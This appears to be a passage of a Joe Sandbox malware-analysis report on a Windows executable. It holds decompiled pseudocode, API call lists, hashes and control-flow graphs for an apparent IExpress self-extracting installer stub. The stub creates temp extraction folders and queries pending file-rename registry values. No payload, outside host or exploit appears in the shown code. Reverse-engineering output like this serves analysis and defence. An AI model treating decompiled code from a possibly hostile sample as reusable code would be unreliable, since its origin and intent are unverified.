                                                                      0x011d5883
                                                                      0x011d5889
                                                                      0x011d588e
                                                                      0x011d588e
                                                                      0x00000000
                                                                      0x011d5896
                                                                      0x011d56ed
                                                                      0x011d56df
                                                                      0x011d56d0
                                                                      0x011d56c1
                                                                      0x011d56a8
                                                                      0x011d565b
                                                                      0x011d565b
                                                                      0x011d565d
                                                                      0x011d5669
                                                                      0x011d5669
                                                                      0x011d565f
                                                                      0x011d565f
                                                                      0x011d5665
                                                                      0x011d5667
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d5667
                                                                      0x011d566c
                                                                      0x011d5673
                                                                      0x011d5678
                                                                      0x011d567a
                                                                      0x011d589b
                                                                      0x011d589b
                                                                      0x011d5680
                                                                      0x011d5685
                                                                      0x011d568c
                                                                      0x00000000
                                                                      0x011d568c
                                                                      0x011d567a
                                                                      0x011d560e
                                                                      0x011d5613
                                                                      0x011d561a
                                                                      0x011d5620
                                                                      0x011d5626
                                                                      0x00000000
                                                                      0x011d5626
                                                                      0x011d55db
                                                                      0x011d55e0
                                                                      0x011d55e7
                                                                      0x011d55f1
                                                                      0x011d55f6
                                                                      0x011d55f6
                                                                      0x011d55f6
                                                                      0x011d58b7
                                                                      0x011d58c7

                                                                      APIs
                                                                        • Part of subcall function 011D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 011D46A0
                                                                        • Part of subcall function 011D468F: SizeofResource.KERNEL32(00000000,00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46A9
                                                                        • Part of subcall function 011D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 011D46C3
                                                                        • Part of subcall function 011D468F: LoadResource.KERNEL32(00000000,00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46CC
                                                                        • Part of subcall function 011D468F: LockResource.KERNEL32(00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46D3
                                                                        • Part of subcall function 011D468F: memcpy_s.MSVCRT ref: 011D46E5
                                                                        • Part of subcall function 011D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46EF
                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 011D55CF
                                                                      • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 011D5638
                                                                      • LocalFree.KERNEL32(00000000), ref: 011D564C
                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 011D5620
                                                                        • Part of subcall function 011D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 011D4518
                                                                        • Part of subcall function 011D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 011D4554
                                                                        • Part of subcall function 011D6285: GetLastError.KERNEL32(011D5BBC), ref: 011D6285
                                                                      • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 011D56B9
                                                                      • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 011D571E
                                                                      • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 011D5737
                                                                      • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 011D57CD
                                                                      • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 011D57EF
                                                                      • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 011D5802
                                                                        • Part of subcall function 011D2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 011D2654
                                                                      • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 011D5830
                                                                        • Part of subcall function 011D6517: FindResourceA.KERNEL32(011D0000,000007D6,00000005), ref: 011D652A
                                                                        • Part of subcall function 011D6517: LoadResource.KERNEL32(011D0000,00000000,?,?,011D2EE8,00000000,011D19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 011D6538
                                                                        • Part of subcall function 011D6517: DialogBoxIndirectParamA.USER32(011D0000,00000000,00000547,011D19E0,00000000), ref: 011D6557
                                                                        • Part of subcall function 011D6517: FreeResource.KERNEL32(00000000,?,?,011D2EE8,00000000,011D19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 011D6560
                                                                      • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 011D5878
                                                                        • Part of subcall function 011D597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 011D59A8
                                                                        • Part of subcall function 011D597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 011D59AF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                      • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                      • API String ID: 2436801531-3855382519
                                                                      • Opcode ID: d54a538e5d69b61da33e4128761165da84a3c4d8673257777924fd1ce519cf0d
                                                                      • Instruction ID: 3cd24efe92de9e686ec701185ad634673daf242b1d233e79795f044e8470613c
                                                                      • Opcode Fuzzy Hash: d54a538e5d69b61da33e4128761165da84a3c4d8673257777924fd1ce519cf0d
                                                                      • Instruction Fuzzy Hash: C98149B1A05215AADBBDAA799C80BEA767F9F60344F4400B5E996D3180EF748DC1CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      C-Code - Quality: 95%
                                                                      			E011D53A1(CHAR* __ecx, CHAR* __edx) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t5;
                                                                      				long _t13;
                                                                      				int _t14;
                                                                      				CHAR* _t20;
                                                                      				int _t29;
                                                                      				int _t30;
                                                                      				CHAR* _t32;
                                                                      				signed int _t33;
                                                                      				void* _t34;
                                                                      
                                                                      				_t5 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t5 ^ _t33;
                                                                      				_t32 = __edx;
                                                                      				_t20 = __ecx;
                                                                      				_t29 = 0;
                                                                      				while(1) {
                                                                      					E011D171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                      					_t34 = _t34 + 0x10;
                                                                      					_t29 = _t29 + 1;
                                                                      					E011D1680(_t32, 0x104, _t20);
                                                                      					E011D658A(_t32, 0x104,  &_v268); // executed
                                                                      					RemoveDirectoryA(_t32); // executed
                                                                      					_t13 = GetFileAttributesA(_t32); // executed
                                                                      					if(_t13 == 0xffffffff) {
                                                                      						break;
                                                                      					}
                                                                      					if(_t29 < 0x190) {
                                                                      						continue;
                                                                      					}
                                                                      					L3:
                                                                      					_t30 = 0;
                                                                      					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                      						_t30 = 1;
                                                                      						DeleteFileA(_t32);
                                                                      						CreateDirectoryA(_t32, 0);
                                                                      					}
                                                                      					L5:
                                                                      					return E011D6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                      				}
                                                                      				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                      				if(_t14 == 0) {
                                                                      					goto L3;
                                                                      				}
                                                                      				_t30 = 1;
                                                                      				 *0x11d8a20 = 1;
                                                                      				goto L5;
                                                                      			}

















                                                                      0x011d53ac
                                                                      0x011d53b3
                                                                      0x011d53b9
                                                                      0x011d53bb
                                                                      0x011d53bd
                                                                      0x011d53bf
                                                                      0x011d53d1
                                                                      0x011d53d6
                                                                      0x011d53e0
                                                                      0x011d53e2
                                                                      0x011d53f5
                                                                      0x011d53fb
                                                                      0x011d5402
                                                                      0x011d540b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d5413
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d5415
                                                                      0x011d5416
                                                                      0x011d5427
                                                                      0x011d542a
                                                                      0x011d542b
                                                                      0x011d5434
                                                                      0x011d5434
                                                                      0x011d543a
                                                                      0x011d544c
                                                                      0x011d544c
                                                                      0x011d5452
                                                                      0x011d545a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d545e
                                                                      0x011d545f
                                                                      0x00000000

                                                                      APIs
                                                                        • Part of subcall function 011D171E: _vsnprintf.MSVCRT ref: 011D1750
                                                                      • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D53FB
                                                                      • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D5402
                                                                      • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D541F
                                                                      • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D542B
                                                                      • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D5434
                                                                      • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D5452
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                                                                      • API String ID: 1082909758-3862032828
                                                                      • Opcode ID: 95180def651107f5b7e6a41d6b8e255ec0528cf94ef709fed102b813845e96a3
                                                                      • Instruction ID: 9099f5f83bb7661d10fee83f32c9158d8562438af5905fdcca440c0e8941b4d9
                                                                      • Opcode Fuzzy Hash: 95180def651107f5b7e6a41d6b8e255ec0528cf94ef709fed102b813845e96a3
                                                                      • Instruction Fuzzy Hash: B211BF7170611477E72CAA26AC48FAB7A6EEFD5725F000129F66693180DF74898287A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 519 11d256d-11d257d 520 11d2583-11d2589 519->520 521 11d2622-11d2627 call 11d24e0 519->521 523 11d25e8-11d2607 RegOpenKeyExA 520->523 524 11d258b 520->524 526 11d2629-11d262f 521->526 528 11d2609-11d2620 RegQueryInfoKeyA 523->528 529 11d25e3-11d25e6 523->529 524->526 527 11d2591-11d2595 524->527 527->526 531 11d259b-11d25ba RegOpenKeyExA 527->531 530 11d25d1-11d25dd RegCloseKey 528->530 529->526 530->529 531->529 532 11d25bc-11d25cb RegQueryValueExA 531->532 532->530
                                                                      C-Code - Quality: 86%
                                                                      			E011D256D(signed int __ecx) {
                                                                      				int _v8;
                                                                      				void* _v12;
                                                                      				signed int _t13;
                                                                      				signed int _t19;
                                                                      				long _t24;
                                                                      				void* _t26;
                                                                      				int _t31;
                                                                      				void* _t34;
                                                                      
                                                                      				_push(__ecx);
                                                                      				_push(__ecx);
                                                                      				_t13 = __ecx & 0x0000ffff;
                                                                      				_t31 = 0;
                                                                      				if(_t13 == 0) {
                                                                      					_t31 = E011D24E0(_t26);
                                                                      				} else {
                                                                      					_t34 = _t13 - 1;
                                                                      					if(_t34 == 0) {
                                                                      						_v8 = 0;
                                                                      						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                      							goto L7;
                                                                      						} else {
                                                                      							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                      							goto L6;
                                                                      						}
                                                                      						L12:
                                                                      					} else {
                                                                      						if(_t34 > 0 && __ecx <= 3) {
                                                                      							_v8 = 0;
                                                                      							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                      							if(_t24 == 0) {
                                                                      								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                      								L6:
                                                                      								asm("sbb eax, eax");
                                                                      								_v8 = _v8 &  !( ~_t19);
                                                                      								RegCloseKey(_v12); // executed
                                                                      							}
                                                                      							L7:
                                                                      							_t31 = _v8;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return _t31;
                                                                      				goto L12;
                                                                      			}











                                                                      0x011d2572
                                                                      0x011d2573
                                                                      0x011d2575
                                                                      0x011d2578
                                                                      0x011d257d
                                                                      0x011d2627
                                                                      0x011d2583
                                                                      0x011d2586
                                                                      0x011d2589
                                                                      0x011d25eb
                                                                      0x011d2607
                                                                      0x00000000
                                                                      0x011d2609
                                                                      0x011d261a
                                                                      0x00000000
                                                                      0x011d261a
                                                                      0x00000000
                                                                      0x011d258b
                                                                      0x011d258b
                                                                      0x011d259e
                                                                      0x011d25b2
                                                                      0x011d25ba
                                                                      0x011d25cb
                                                                      0x011d25d1
                                                                      0x011d25d6
                                                                      0x011d25da
                                                                      0x011d25dd
                                                                      0x011d25dd
                                                                      0x011d25e3
                                                                      0x011d25e3
                                                                      0x011d25e3
                                                                      0x011d258b
                                                                      0x011d2589
                                                                      0x011d262f
                                                                      0x00000000

                                                                      APIs
                                                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,011D4096,011D4096,?,011D1ED3,00000001,00000000,?,?,011D4137,?), ref: 011D25B2
                                                                      • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,011D4096,?,011D1ED3,00000001,00000000,?,?,011D4137,?,011D4096), ref: 011D25CB
                                                                      • RegCloseKey.KERNELBASE(?,?,011D1ED3,00000001,00000000,?,?,011D4137,?,011D4096), ref: 011D25DD
                                                                      • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,011D4096,011D4096,?,011D1ED3,00000001,00000000,?,?,011D4137,?), ref: 011D25FF
                                                                      • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,011D4096,00000000,00000000,00000000,00000000,?,011D1ED3,00000001,00000000), ref: 011D261A
                                                                      Strings
                                                                      • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 011D25F5
                                                                      • PendingFileRenameOperations, xrefs: 011D25C3
                                                                      • System\CurrentControlSet\Control\Session Manager, xrefs: 011D25A8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: OpenQuery$CloseInfoValue
                                                                      • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                      • API String ID: 2209512893-559176071
                                                                      • Opcode ID: 8ef94e2812f3307b9930141d6a0065e19346e1c3d18bd1bc397bb43af8240c9f
                                                                      • Instruction ID: 80466547b6b4c2a478834a6f11bd4ae7e0e8664f67d0bbbd3832773036d4b010
                                                                      • Opcode Fuzzy Hash: 8ef94e2812f3307b9930141d6a0065e19346e1c3d18bd1bc397bb43af8240c9f
                                                                      • Instruction Fuzzy Hash: 27118C35943238BBEB38DBA69C49DFBBE7CEF026A1F504065F929A2004D7304A44D6A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 533 11d6a60-11d6a91 call 11d7155 call 11d7208 GetStartupInfoW 539 11d6a93-11d6aa2 533->539 540 11d6abc-11d6abe 539->540 541 11d6aa4-11d6aa6 539->541 544 11d6abf-11d6ac5 540->544 542 11d6aaf-11d6aba Sleep 541->542 543 11d6aa8-11d6aad 541->543 542->539 543->544 545 11d6ac7-11d6acf _amsg_exit 544->545 546 11d6ad1-11d6ad7 544->546 547 11d6b0b-11d6b11 545->547 548 11d6ad9-11d6ae9 call 11d6c3f 546->548 549 11d6b05 546->549 551 11d6b2e-11d6b30 547->551 552 11d6b13-11d6b24 _initterm 547->552 553 11d6aee-11d6af2 548->553 549->547 554 11d6b3b-11d6b42 551->554 555 11d6b32-11d6b39 551->555 552->551 553->547 556 11d6af4-11d6b00 553->556 557 11d6b44-11d6b51 call 11d7060 554->557 558 11d6b67-11d6b71 554->558 555->554 560 11d6c39-11d6c3e call 11d724d 556->560 557->558 571 11d6b53-11d6b65 557->571 559 11d6b74-11d6b79 558->559 562 11d6b7b-11d6b7d 559->562 563 11d6bc5-11d6bc8 559->563 568 11d6b7f-11d6b81 562->568 569 11d6b94-11d6b98 562->569 566 11d6bca-11d6bd3 563->566 567 11d6bd6-11d6be3 _ismbblead 563->567 566->567 572 11d6be9-11d6bed 567->572 573 11d6be5-11d6be6 567->573 568->563 574 11d6b83-11d6b85 568->574 575 11d6b9a-11d6b9e 569->575 576 11d6ba0-11d6ba2 569->576 571->558 572->559 578 11d6c1e-11d6c25 572->578 573->572 574->569 579 11d6b87-11d6b8a 574->579 580 11d6ba3-11d6bbc call 11d2bfb 575->580 576->580 582 11d6c27-11d6c2d _cexit 578->582 583 11d6c32 578->583 579->569 581 11d6b8c-11d6b92 579->581 580->578 586 11d6bbe-11d6bbf exit 580->586 581->574 582->583 583->560 586->563
                                                                      C-Code - Quality: 51%
                                                                      			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                      				signed int* _t25;
                                                                      				signed int _t26;
                                                                      				signed int _t29;
                                                                      				int _t30;
                                                                      				signed int _t37;
                                                                      				signed char _t41;
                                                                      				signed int _t53;
                                                                      				signed int _t54;
                                                                      				intOrPtr _t56;
                                                                      				signed int _t58;
                                                                      				signed int _t59;
                                                                      				intOrPtr* _t60;
                                                                      				void* _t62;
                                                                      				void* _t67;
                                                                      				void* _t68;
                                                                      
                                                                      				E011D7155();
                                                                      				_push(0x58);
                                                                      				_push(0x11d72b8);
                                                                      				E011D7208(__ebx, __edi, __esi);
                                                                      				 *(_t62 - 0x20) = 0;
                                                                      				GetStartupInfoW(_t62 - 0x68);
                                                                      				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                      				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                      				_t53 = 0;
                                                                      				while(1) {
                                                                      					asm("lock cmpxchg [edx], ecx");
                                                                      					if(0 == 0) {
                                                                      						break;
                                                                      					}
                                                                      					if(0 != _t56) {
                                                                      						Sleep(0x3e8);
                                                                      						continue;
                                                                      					} else {
                                                                      						_t58 = 1;
                                                                      						_t53 = 1;
                                                                      					}
                                                                      					L7:
                                                                      					_t67 =  *0x11d88b0 - _t58; // 0x2
                                                                      					if(_t67 != 0) {
                                                                      						__eflags =  *0x11d88b0; // 0x2
                                                                      						if(__eflags != 0) {
                                                                      							 *0x11d81e4 = _t58;
                                                                      							goto L13;
                                                                      						} else {
                                                                      							 *0x11d88b0 = _t58;
                                                                      							_t37 = E011D6C3F(0x11d10b8, 0x11d10c4); // executed
                                                                      							__eflags = _t37;
                                                                      							if(__eflags == 0) {
                                                                      								goto L13;
                                                                      							} else {
                                                                      								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                      								_t30 = 0xff;
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						_push(0x1f);
                                                                      						L011D6FF4();
                                                                      						L13:
                                                                      						_t68 =  *0x11d88b0 - _t58; // 0x2
                                                                      						if(_t68 == 0) {
                                                                      							_push(0x11d10b4);
                                                                      							_push(0x11d10ac);
                                                                      							L011D7202();
                                                                      							 *0x11d88b0 = 2;
                                                                      						}
                                                                      						if(_t53 == 0) {
                                                                      							 *0x11d88ac = 0;
                                                                      						}
                                                                      						_t71 =  *0x11d88b4;
                                                                      						if( *0x11d88b4 != 0 && E011D7060(_t71, 0x11d88b4) != 0) {
                                                                      							_t60 =  *0x11d88b4; // 0x0
                                                                      							 *0x11da288(0, 2, 0);
                                                                      							 *_t60();
                                                                      						}
                                                                      						_t25 = __imp___acmdln; // 0x74895b9c
                                                                      						_t59 =  *_t25;
                                                                      						 *(_t62 - 0x1c) = _t59;
                                                                      						_t54 =  *(_t62 - 0x20);
                                                                      						while(1) {
                                                                      							_t41 =  *_t59;
                                                                      							if(_t41 > 0x20) {
                                                                      								goto L32;
                                                                      							}
                                                                      							if(_t41 != 0) {
                                                                      								if(_t54 != 0) {
                                                                      									goto L32;
                                                                      								} else {
                                                                      									while(_t41 != 0 && _t41 <= 0x20) {
                                                                      										_t59 = _t59 + 1;
                                                                      										 *(_t62 - 0x1c) = _t59;
                                                                      										_t41 =  *_t59;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                      							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                      								_t29 = 0xa;
                                                                      							} else {
                                                                      								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                      							}
                                                                      							_push(_t29);
                                                                      							_t30 = E011D2BFB(0x11d0000, 0, _t59); // executed
                                                                      							 *0x11d81e0 = _t30;
                                                                      							__eflags =  *0x11d81f8;
                                                                      							if( *0x11d81f8 == 0) {
                                                                      								exit(_t30); // executed
                                                                      								goto L32;
                                                                      							}
                                                                      							__eflags =  *0x11d81e4;
                                                                      							if( *0x11d81e4 == 0) {
                                                                      								__imp___cexit();
                                                                      								_t30 =  *0x11d81e0; // 0x0
                                                                      							}
                                                                      							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                      							goto L40;
                                                                      							L32:
                                                                      							__eflags = _t41 - 0x22;
                                                                      							if(_t41 == 0x22) {
                                                                      								__eflags = _t54;
                                                                      								_t15 = _t54 == 0;
                                                                      								__eflags = _t15;
                                                                      								_t54 = 0 | _t15;
                                                                      								 *(_t62 - 0x20) = _t54;
                                                                      							}
                                                                      							_t26 = _t41 & 0x000000ff;
                                                                      							__imp___ismbblead(_t26);
                                                                      							__eflags = _t26;
                                                                      							if(_t26 != 0) {
                                                                      								_t59 = _t59 + 1;
                                                                      								__eflags = _t59;
                                                                      								 *(_t62 - 0x1c) = _t59;
                                                                      							}
                                                                      							_t59 = _t59 + 1;
                                                                      							 *(_t62 - 0x1c) = _t59;
                                                                      						}
                                                                      					}
                                                                      					L40:
                                                                      					return E011D724D(_t30);
                                                                      				}
                                                                      				_t58 = 1;
                                                                      				__eflags = 1;
                                                                      				goto L7;
                                                                      			}


















                                                                      0x011d6a60
                                                                      0x011d6a6a
                                                                      0x011d6a6c
                                                                      0x011d6a71
                                                                      0x011d6a78
                                                                      0x011d6a7f
                                                                      0x011d6a85
                                                                      0x011d6a8e
                                                                      0x011d6a91
                                                                      0x011d6a93
                                                                      0x011d6a9c
                                                                      0x011d6aa2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d6aa6
                                                                      0x011d6ab4
                                                                      0x00000000
                                                                      0x011d6aa8
                                                                      0x011d6aaa
                                                                      0x011d6aab
                                                                      0x011d6aab
                                                                      0x011d6abf
                                                                      0x011d6abf
                                                                      0x011d6ac5
                                                                      0x011d6ad1
                                                                      0x011d6ad7
                                                                      0x011d6b05
                                                                      0x00000000
                                                                      0x011d6ad9
                                                                      0x011d6ad9
                                                                      0x011d6ae9
                                                                      0x011d6af0
                                                                      0x011d6af2
                                                                      0x00000000
                                                                      0x011d6af4
                                                                      0x011d6af4
                                                                      0x011d6afb
                                                                      0x011d6afb
                                                                      0x011d6af2
                                                                      0x011d6ac7
                                                                      0x011d6ac7
                                                                      0x011d6ac9
                                                                      0x011d6b0b
                                                                      0x011d6b0b
                                                                      0x011d6b11
                                                                      0x011d6b13
                                                                      0x011d6b18
                                                                      0x011d6b1d
                                                                      0x011d6b24
                                                                      0x011d6b24
                                                                      0x011d6b30
                                                                      0x011d6b39
                                                                      0x011d6b39
                                                                      0x011d6b3b
                                                                      0x011d6b42
                                                                      0x011d6b57
                                                                      0x011d6b5f
                                                                      0x011d6b65
                                                                      0x011d6b65
                                                                      0x011d6b67
                                                                      0x011d6b6c
                                                                      0x011d6b6e
                                                                      0x011d6b71
                                                                      0x011d6b74
                                                                      0x011d6b74
                                                                      0x011d6b79
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d6b7d
                                                                      0x011d6b81
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d6b83
                                                                      0x011d6b8c
                                                                      0x011d6b8d
                                                                      0x011d6b90
                                                                      0x011d6b90
                                                                      0x011d6b83
                                                                      0x011d6b81
                                                                      0x011d6b94
                                                                      0x011d6b98
                                                                      0x011d6ba2
                                                                      0x011d6b9a
                                                                      0x011d6b9a
                                                                      0x011d6b9a
                                                                      0x011d6ba3
                                                                      0x011d6bab
                                                                      0x011d6bb0
                                                                      0x011d6bb5
                                                                      0x011d6bbc
                                                                      0x011d6bbf
                                                                      0x00000000
                                                                      0x011d6bbf
                                                                      0x011d6c1e
                                                                      0x011d6c25
                                                                      0x011d6c27
                                                                      0x011d6c2d
                                                                      0x011d6c2d
                                                                      0x011d6c32
                                                                      0x00000000
                                                                      0x011d6bc5
                                                                      0x011d6bc5
                                                                      0x011d6bc8
                                                                      0x011d6bcc
                                                                      0x011d6bce
                                                                      0x011d6bce
                                                                      0x011d6bd1
                                                                      0x011d6bd3
                                                                      0x011d6bd3
                                                                      0x011d6bd6
                                                                      0x011d6bda
                                                                      0x011d6be1
                                                                      0x011d6be3
                                                                      0x011d6be5
                                                                      0x011d6be5
                                                                      0x011d6be6
                                                                      0x011d6be6
                                                                      0x011d6be9
                                                                      0x011d6bea
                                                                      0x011d6bea
                                                                      0x011d6b74
                                                                      0x011d6c39
                                                                      0x011d6c3e
                                                                      0x011d6c3e
                                                                      0x011d6abe
                                                                      0x011d6abe
                                                                      0x00000000

                                                                      APIs
                                                                        • Part of subcall function 011D7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 011D7182
                                                                        • Part of subcall function 011D7155: GetCurrentProcessId.KERNEL32 ref: 011D7191
                                                                        • Part of subcall function 011D7155: GetCurrentThreadId.KERNEL32 ref: 011D719A
                                                                        • Part of subcall function 011D7155: GetTickCount.KERNEL32 ref: 011D71A3
                                                                        • Part of subcall function 011D7155: QueryPerformanceCounter.KERNEL32(?), ref: 011D71B8
                                                                      • GetStartupInfoW.KERNEL32(?,011D72B8,00000058), ref: 011D6A7F
                                                                      • Sleep.KERNEL32(000003E8), ref: 011D6AB4
                                                                      • _amsg_exit.MSVCRT ref: 011D6AC9
                                                                      • _initterm.MSVCRT ref: 011D6B1D
                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 011D6B49
                                                                      • exit.KERNELBASE ref: 011D6BBF
                                                                      • _ismbblead.MSVCRT ref: 011D6BDA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
